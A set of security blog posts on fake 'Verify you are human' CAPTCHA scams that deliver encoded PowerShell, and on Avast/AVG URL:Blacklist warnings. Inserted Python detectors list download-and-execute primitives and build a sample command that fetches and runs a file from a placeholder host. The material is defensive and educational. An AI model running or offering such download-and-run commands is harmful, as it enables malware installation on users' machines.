  2. Track your bank transactions. Having this much information directly from the bank, fraudsters can try using it to charge customers’ accounts. There are ways to get card numbers and other identifiers, which is enough to initiate a transaction. If there is any suspicious activity, ask the bank to suspend the account and revert the unknown transactions.
  3. Treat all the phone calls, emails and SMS from the bank with extra caution. The most obvious trick fraudsters may try to pull is to contact people saying there’s something wrong with their BBVA bank account. Typically, they push users into sharing security codes, which grant them access to the account and all the funds. Double-check phone numbers and email addresses that contact you about this matter, and never share security codes with anyone who asks for them – they are only for your sign-in operations.

Verify you are Human Scam https://gridinsoft.com/blogs/verify-you-are-human-scam/ Mon, 11 Nov 2024 14:59:48 +0000

While browsing the Web, you can occasionally land on a page that says “Verify you are human” and asks you to perform certain manipulations with PowerShell or Command Prompt. These pages are, in fact, scams that aim at deploying malicious software or unwanted programs to your system. Let me explain how they work and how to avoid them in the future.

What is Verify you are human scam?

“Verify you are human” is a chain of malicious websites that trick visitors into downloading and running malicious programs. As you could have guessed by the name, they mimic CAPTCHA pages, but in fact have nothing in common with normal human verification sites. Their methods mainly target people who are unaware of how the verification normally works.

Verify you are human scam

Most often, users get to such pages after clicking a certain element on a shady website, like a page with pirated movies or unlicensed software. Fraudsters who maintain such websites stuff every interactive element with redirects that send visitors to malicious pages of various kinds. As the redirect happens in the same tab, Verify you are human scam pages are really convincing for unsuspecting users.

We earlier wrote how Lumma Stealer spreads through such fake verification sites. It covers quite an extensive fraudulent scheme that attacks hundreds of people each day – consider checking it out.

How does this scam work?

On the Verify you are Human page, the user sees just a button saying “I am not a robot”. Upon clicking it, the button changes to a request to open PowerShell (or, in some cases, Command Prompt), press the Ctrl+V combination and then Enter. Behind the scenes, a malicious script is copied to the clipboard when the user clicks the first button. Below, you can see our analysis of such a script:

PowerShell command explained

Once they paste that script into PowerShell, the main stage of the attack happens. This script contains base64-encoded instructions to connect to a remote server, download a file and run it. Obviously, there’s no hope any of the files downloaded that way will be legitimate. Here is the short list of malware types that can infect computers in such a way:

Malicious browser extensions. This is a type of malware that has become massively widespread over the last few months. Their key purpose is intercepting search queries and sending the user to a no-name search engine, with the results riddled with advertisements. Additionally, such plugins appear to collect personal information about the user that the browser keeps for autofill forms.

I’ve covered several malicious browser extensions that were enormously widespread a few weeks ago. If you are interested in learning more about such threats, here is the article about PrimeLookup browser extension.

Infostealer or backdoor malware. These are among the most dangerous malware types, due to stealthiness and delayed damage potential. It is hard to notice the symptoms of their activity, but later, one can see online accounts being stolen. Backdoors can also selectively steal specific files and provide remote access to the computer.

Unwanted programs. The variety of this type is vast: from fake system optimizers to “advanced search bars” that hijack the web browser and act pretty much like the said malicious browser extensions. They rarely hide their presence, and, on the contrary, try convincing the user that they are tremendously useful.
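
As an added example (not code from the original article), the Python sketch below triages a command a user was told to paste: it finds PowerShell's -EncodedCommand flag, decodes the base64 payload, and checks for the download-and-run pattern described above. The indicator lists, the verdict names and the sample command are constructed assumptions for illustration.

```python
import base64
import binascii
import re

# "-name value" pairs where the value looks like a base64 blob.
FLAG_BLOB = re.compile(r"(?i)(?:^|\s)[-/]([a-z]+)\s+([A-Za-z0-9+/]{16,}={0,2})(?=\s|$)")
# Assumed indicator lists (not exhaustive): common download and execution primitives.
DOWNLOAD = re.compile(r"(?i)\b(invoke-webrequest|iwr|invoke-restmethod|irm|curl|wget|"
                      r"start-bitstransfer|downloadstring|downloadfile|net\.webclient)\b")
EXECUTE = re.compile(r"(?i)\b(invoke-expression|iex|start-process|mshta|rundll32|regsvr32)\b")
URL = re.compile(r"(?i)\bhttps?://[^\s'\"()]+")


def is_encoded_flag(name):
    """PowerShell accepts -EncodedCommand, any prefix of it (-e, -enc, ...) and the alias -ec."""
    name = name.lower()
    return name == "ec" or "encodedcommand".startswith(name)


def decode_payload(blob):
    """Decode an -EncodedCommand value (base64 over UTF-16LE text); None if it is not one."""
    try:
        text = base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None
    readable = sum(c.isascii() and (c.isprintable() or c in "\r\n\t") for c in text)
    # Random bytes often "decode" as UTF-16, so require mostly readable ASCII.
    return text if text and readable / len(text) >= 0.9 else None


def triage(command_line):
    """Return what the pasted command hides and a verdict: block, review or allow."""
    decoded = None
    visible = command_line
    for name, blob in FLAG_BLOB.findall(command_line):
        if is_encoded_flag(name):
            decoded = decode_payload(blob)
            if decoded is not None:
                # Drop the blob so its random letters cannot match an indicator by chance.
                visible = command_line.replace(blob, " ")
                break
    text = visible if decoded is None else visible + "\n" + decoded
    downloads = bool(DOWNLOAD.search(text))
    executes = bool(EXECUTE.search(text))
    if downloads and executes:
        verdict = "block"    # fetches remote content and runs it
    elif decoded is not None or downloads or executes:
        verdict = "review"   # hidden or risky, but not the full pattern
    else:
        verdict = "allow"
    return {"encoded": decoded is not None, "decoded": decoded,
            "urls": URL.findall(text), "downloads": downloads,
            "executes": executes, "verdict": verdict}


def build_constructed_sample():
    """Constructed test input: placeholder host, encoded the way PowerShell expects."""
    script = ("iwr https://example.invalid/verify.txt -OutFile $env:TEMP\\v.exe; "
              "Start-Process $env:TEMP\\v.exe")
    blob = base64.b64encode(script.encode("utf-16-le")).decode("ascii")
    return "powershell -enc " + blob


if __name__ == "__main__":
    for line in (build_constructed_sample(), "Get-ChildItem C:\\Users"):
        result = triage(line)
        print(result["verdict"], result["urls"], "<-", line[:40])
```

The same check can run over process command lines collected by endpoint logging, where an encoded PowerShell command launched right after a browser session is worth a closer look.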

How to delete malware?

If you have interacted with a Verify you are human scam page, chances are, there is a pesky malware running in the system. To get rid of it and any of its traces, consider running a Full scan with GridinSoft Anti-Malware. This program will quickly delete any malicious program, regardless of their source and form. And there is a free trial option, too – no card info needed. Click the banner below and get your system cleaned up.


To avoid landing on such websites in the future, you can block redirects completely, so no website will be able to pull you into another dirty scam. Disabling redirects is a rather simple process; here is a step-by-step guide for Google Chrome and Chromium-based browsers:

  • Step 1. Open Chrome, then go to the Settings tab. Here, opt for the Privacy and Security tab in the left menu.

Settings - Privacy

  • Step 2. All the way down, you will see the Site Settings menu. Click it, and scroll down to the Popups and Redirects section.

Step 2 popups and redirections

  • Step 3. In here, set the Default behavior to “Don’t allow sites to send popups or use redirects”. This setting will block the redirections, and, as a bonus, disable push notifications.

Step 3 Disable

URL:Blacklist Detection Avast and AVG Warnings https://gridinsoft.com/blogs/url-blacklist-avast/ Mon, 30 Sep 2024 11:10:17 +0000

URL:Blacklist is a security detection used by Avast and AVG antivirus programs to flag potentially dangerous websites. This warning typically appears after clicking a link, advertisement, or sometimes immediately upon opening your browser. While this protective feature helps shield users from various online threats, it can also trigger false positives on legitimate websites. This comprehensive guide explains everything you need to know about URL:Blacklist detection, how to interpret these warnings, and what steps to take when they appear.

URL:Blacklist detection pop-up

What is URL:Blacklist Detection?

URL:Blacklist is a detection generated by the network security engine integrated into Avast and AVG antivirus solutions. This protection feature is enabled by default and actively monitors all outgoing connections from your device, blocking those deemed potentially harmful. When you attempt to visit a website that the security engine identifies as suspicious or dangerous, you’ll receive a URL:Blacklist warning alerting you to the potential risk.

One significant limitation of this detection is its lack of specificity. Unlike some security alerts that provide detailed information about the exact nature of the threat, URL:Blacklist warnings typically offer minimal context about why a particular site was flagged. This ambiguity can leave users confused about the severity of the risk and whether it’s safe to proceed.

It’s important to understand that URL:Blacklist doesn’t always indicate malware activity, though this can certainly be one reason for the alert. These warnings can be triggered by various types of suspicious or potentially harmful websites, ranging from online scams and phishing attempts to legitimate sites that have been compromised to distribute malware.

When you encounter a URL:Blacklist warning and need more specific information about the potential threat, we recommend using a free online website checker to perform a more detailed analysis of the flagged URL.

[Figure: URL:Blacklist detection process flow, showing how Avast/AVG protects you from dangerous websites. 1. The user clicks a link. 2. The web browser initiates the connection and sends the request. 3. Avast/AVG checks the URL (shield scan). 4. Security decision: a dangerous site is blocked with a warning, a safe site is allowed and the user proceeds, and a false positive can be added to exceptions by the user.]

Types of Websites That Trigger URL:Blacklist Warnings

Various types of websites can trigger URL:Blacklist warnings. Understanding these categories can help you better interpret what these alerts might be trying to protect you from:

| Blacklist Type | Description | Example |
|---|---|---|
| Phishing site | Phishing is probably the most widely known type of online scam. Such websites usually mimic the login page of a well-known site, such as Microsoft, Amazon, eBay, or an online banking page. They contain a script that allows hackers to extract the input (i.e. login credentials). | kuex bet |
| Fake online shopping site | Another widely known case is the shopping website that takes an order but never delivers it. It may offer astonishing discounts, selling items worth several hundred dollars for just a nickel. A user trying to get the desired item almost for free will happily pay, only to discover that the order will never be delivered. | Soolinen |
| Cryptocurrency scam | The rising popularity of cryptocurrencies has led a lot of inexperienced people to try getting into this topic. Scammers take advantage of this, offering sites they established yesterday to trade crypto, participate in airdrops, or create a hot wallet. They then steal any information and money that gets into these sites. One particular kind of cryptocurrency scam is the so-called crypto drainer, which empties the hot wallet once the user connects it to the scam site. | exnori |
| Fake raffle prizes | A rather old kind of scam site that encourages people to share their personal information by offering sweet rewards. The latest iPhone, a new Samsung smartphone, or a $1000 gift card just for sharing personal information sounds great. However, none of this will ever reach the “winner”, as the prize never existed. The only thing such scams aim for is users’ personal information. | 1xbetwinprizes |
| Fake job offerings | This type of scam is comparatively new but works with the same intent as the previous one. Fraudsters lure people with a job offer, typically targeting those who seek a remote job. After contacting the victim, they say the victim should send them all of their documents, including SSN and ITIN. On top of that, the victim is asked to pay a small (~$100) fee to cover paperwork expenses. Then the scammers simply cut off the conversation. | clickjob work |

Below, you can see examples of dangerous websites that have triggered URL:Blacklist warnings, analyzed with online scanning tools. These examples demonstrate different types of threats and show how even seemingly legitimate sites can pose significant risks.

| URL | Threat Type | Full Report |
|---|---|---|
| D1b2hzwettncwz.cloudfront.net | Malware distribution | Scan Result |
| A2zapk.com | Phishing | Scan Result |
| Bloomsbody.com | Fake Online Shop | Scan Result |

You can conduct your investigation using our Inspector API by performing a search with the keys “Phishing” or “Fake Shop”.

Examining these examples reveals certain patterns. Sometimes, the URL itself offers clues about a website’s legitimacy, as dangerous pages often use unfamiliar domains with seemingly random characters. However, this isn’t always a reliable indicator, as many scam websites—particularly those designed for shopping fraud—often use clear, believable domain names designed to appear legitimate at first glance.

Understanding False Positive Detections

While URL:Blacklist detection helps protect users from genuine threats, the system is not perfect. There are numerous reported cases where URL:Blacklist incorrectly flags legitimate and safe websites[1], [2]. These false positives can occur for various reasons, usually related to the detection mechanisms employed by the antivirus software.

Based on user reports from various forums, certain types of legitimate websites seem particularly prone to triggering false URL:Blacklist warnings:

  • File-sharing services: Platforms that allow users to share files, even legitimate ones, may be flagged due to their potential for distributing malicious content.
  • Cryptocurrency mining pools: Crypto mining pools are often flagged because some malware uses similar connections for cryptocurrency mining without user consent.
  • Newly created websites: Recently launched websites may lack sufficient reputation history to be considered trustworthy by security databases.
  • Less popular but legitimate websites: Sites with lower traffic volumes may not have established sufficient trust signals for security algorithms.

While the caution exercised by Avast and AVG is understandable, these false positives can be frustrating, especially when they block access to websites you know to be safe and need to use regularly.

How to Handle URL:Blacklist False Positives

If you encounter a URL:Blacklist warning for a website you know to be safe, you have several options:

Option 1: Add the Website to Exceptions (Recommended)

For users who want to maintain the protection of Avast/AVG’s web shield while allowing access to specific trusted sites, adding the website to your exceptions list is the recommended approach:

  1. Open Avast or AVG antivirus software
  2. Navigate to Settings → General
  3. Find the Exceptions tab
  4. Click the Add Exception button
  5. Paste the URL of the website you want to allow
  6. Click Add Exception to confirm

This method allows you to maintain protection against genuinely dangerous sites while preventing false positives for specific trusted websites.

Option 2: Disable Web Shield Protection

If you find the URL:Blacklist feature too restrictive or encounter frequent false positives, you can disable the Web Shield component entirely. Note that this will reduce your protection against malicious websites:

  1. Open Avast or AVG antivirus
  2. Go to Settings → Protection → Core Shield
  3. Select the Web Shield tab in the top navigation
  4. Uncheck all options to disable web protection
  5. Restart your computer to apply the changes

Before disabling this protection, consider whether the convenience outweighs the potential security risks. If you choose to disable Web Shield, it’s advisable to exercise additional caution when browsing and consider using alternative web protection tools.

When URL:Blacklist Warnings Indicate Malware Infection

While many URL:Blacklist warnings occur when you deliberately try to visit a website, a particularly concerning scenario is when these alerts appear frequently and seemingly at random, regardless of what websites you’re trying to access. If you notice URL:Blacklist warnings appearing constantly during your normal browsing activities, this could indicate a malware infection on your system.

Several types of malware can trigger these persistent URL:Blacklist warnings by attempting to connect to malicious servers in the background:

  • Adware: Less severe but annoying malware that displays unwanted advertisements and may redirect your browser to promotional websites.
  • Browser Hijackers: Malware that modifies browser settings to redirect searches and visits to specific websites without user consent.
  • Backdoors: More dangerous malware that provides attackers with remote access to your system, often attempting to communicate with command and control servers.
  • Loaders: Malicious programs designed to download and install additional malware from remote servers.

The last two categories pose significant security risks and should not be ignored. If you suspect a malware infection is causing URL:Blacklist warnings, performing a thorough system scan with specialized anti-malware software is strongly recommended. For effective detection and removal of these threats, GridinSoft Anti-Malware is an excellent choice, as it’s designed to identify and eliminate threats that other antivirus solutions might miss.

How to Remove Malware Causing URL:Blacklist Warnings

If you’re experiencing persistent URL:Blacklist warnings that suggest a malware infection, follow these steps to scan and clean your system:

Download and install GridinSoft Anti-Malware. After the installation, run a Full scan: this will check all the volumes present in the system, including hidden folders and system files. Scanning will take around 15 minutes.

After the scan, you will see the list of detected malicious and unwanted elements. You can adjust the action the anti-malware program takes for each element: click "Advanced mode" and see the options in the drop-down menus. You can also see extended information about each detection: malware type, effects and potential source of infection.

Click "Clean Now" to start the removal process. Important: the removal process may take several minutes when there are a lot of detections. Do not interrupt this process, and your system will be as clean as new.

Frequently Asked Questions

Is it safe to ignore URL:Blacklist warnings?

Generally, it’s not advisable to ignore URL:Blacklist warnings, as they often indicate genuine security threats. These warnings are designed to protect you from websites that could steal personal information, distribute malware, or scam you financially. However, if you’re absolutely certain that the flagged website is legitimate (for example, it’s a well-established site you’ve used safely for years), you can add it to your antivirus exceptions list rather than bypassing the warning each time. If you’re experiencing frequent warnings without actively trying to visit new websites, this could indicate a malware infection that requires immediate attention.

Why does AVG/Avast flag websites that other antivirus programs don’t?

Avast and AVG (which are now owned by the same company) may flag websites that other antivirus programs don’t because they use different detection algorithms and threat intelligence databases. Their Web Shield feature employs a more aggressive approach to web protection compared to some competitors. This can result in better protection against emerging threats, but it also increases the likelihood of false positives. Additionally, Avast/AVG updates their URL blacklist database frequently, sometimes detecting suspicious websites before other security solutions. If you believe a website has been incorrectly flagged, you can report the false positive to Avast/AVG for review, or add the site to your exceptions list if you’re confident it’s safe.

How often is the URL:Blacklist database updated?

The URL:Blacklist database used by Avast and AVG is updated continuously throughout the day. The companies maintain a cloud-based threat intelligence network that collects and analyzes data from millions of users worldwide, allowing them to identify and add new malicious URLs to their database in near real-time. This frequent updating is necessary to keep pace with the rapidly evolving landscape of online threats, as new malicious websites are created daily while previously compromised sites may be cleaned and removed from the blacklist. The database receives both automated updates based on threat detection algorithms and manual verification by security analysts who investigate potential threats.

Can URL:Blacklist warnings appear on mobile devices?

Yes, URL:Blacklist warnings can appear on mobile devices that have Avast or AVG security applications installed. The mobile versions of these security solutions include similar web protection features to their desktop counterparts, monitoring web traffic and blocking access to potentially harmful websites. On Android devices, the protection works across different browsers through the security app’s web shield component. On iOS, due to platform restrictions, the protection typically works through a secure browser provided by the security application. If you encounter these warnings frequently on your mobile device without actively browsing to new websites, it could indicate adware or other malicious apps that are attempting to connect to suspicious servers in the background.

Does URL:Blacklist only check the domain or the entire URL?

URL:Blacklist checks both domain-level and full URL path information when evaluating potential threats. While many blacklisting systems primarily focus on domain names, modern web security solutions like Avast and AVG’s URL:Blacklist implement more sophisticated scanning that considers the complete URL, including specific pages and parameters. This approach provides more comprehensive protection, as it can identify specific malicious pages within otherwise legitimate domains that have been compromised. For example, a legitimate website might have a specific page that has been infected with malware or set up for phishing, while the main domain remains safe. The granular scanning also helps reduce false positives by potentially allowing access to safe sections of partially compromised websites.
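The difference between domain-level and full-URL matching, shown as an added example that is not Avast/AVG's implementation and not code from the original article. The blocklist entries, the exception list, all function names, and the choices to match parent domains, match paths on segment boundaries and let exceptions take precedence are assumptions made for illustration.

```python
import posixpath
import re
from urllib.parse import unquote, urlsplit

# Constructed sample data, not real indicators (.example is a reserved TLD).
BLOCKED_DOMAINS = {"malware-host.example", "miner.example"}
# Path-level entry: one compromised page on an otherwise clean domain.
BLOCKED_URLS = {("legit-shop.example", "/promo/login")}
# User exception for a known false positive (Option 1 in the article).
EXCEPTIONS = {"pool.miner.example"}


def normalize(url):
    """Return (host, path) in canonical form, or None if the URL is unusable."""
    try:
        parts = urlsplit(url if "://" in url else "http://" + url)
    except ValueError:
        return None
    host = (parts.hostname or "").rstrip(".")
    if not host:
        return None
    # Decode %XX escapes, collapse repeated slashes and resolve "." / ".."
    # so differently spelled forms of one page compare equal.
    path = re.sub(r"/+", "/", unquote(parts.path) or "/")
    return host, posixpath.normpath(path)


def host_and_parents(host):
    """a.b.example -> ['a.b.example', 'b.example'] (the bare TLD is skipped)."""
    labels = host.split(".")
    return [".".join(labels[i:]) for i in range(max(len(labels) - 1, 1))]


def check_url(url):
    """Return 'invalid', 'allowed', 'allowed:exception', 'blocked:domain' or 'blocked:url'."""
    parsed = normalize(url)
    if parsed is None:
        return "invalid"
    host, path = parsed
    names = host_and_parents(host)
    if any(n in EXCEPTIONS for n in names):
        return "allowed:exception"
    if any(n in BLOCKED_DOMAINS for n in names):
        return "blocked:domain"
    for blocked_host, blocked_path in BLOCKED_URLS:
        # Match the flagged page or anything beneath it, on segment boundaries.
        if blocked_host in names and (path + "/").startswith(blocked_path + "/"):
            return "blocked:url"
    return "allowed"
```

With a path-level entry, the rest of `legit-shop.example` stays reachable while the flagged page is blocked even when its URL is written with extra slashes or percent-escapes.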
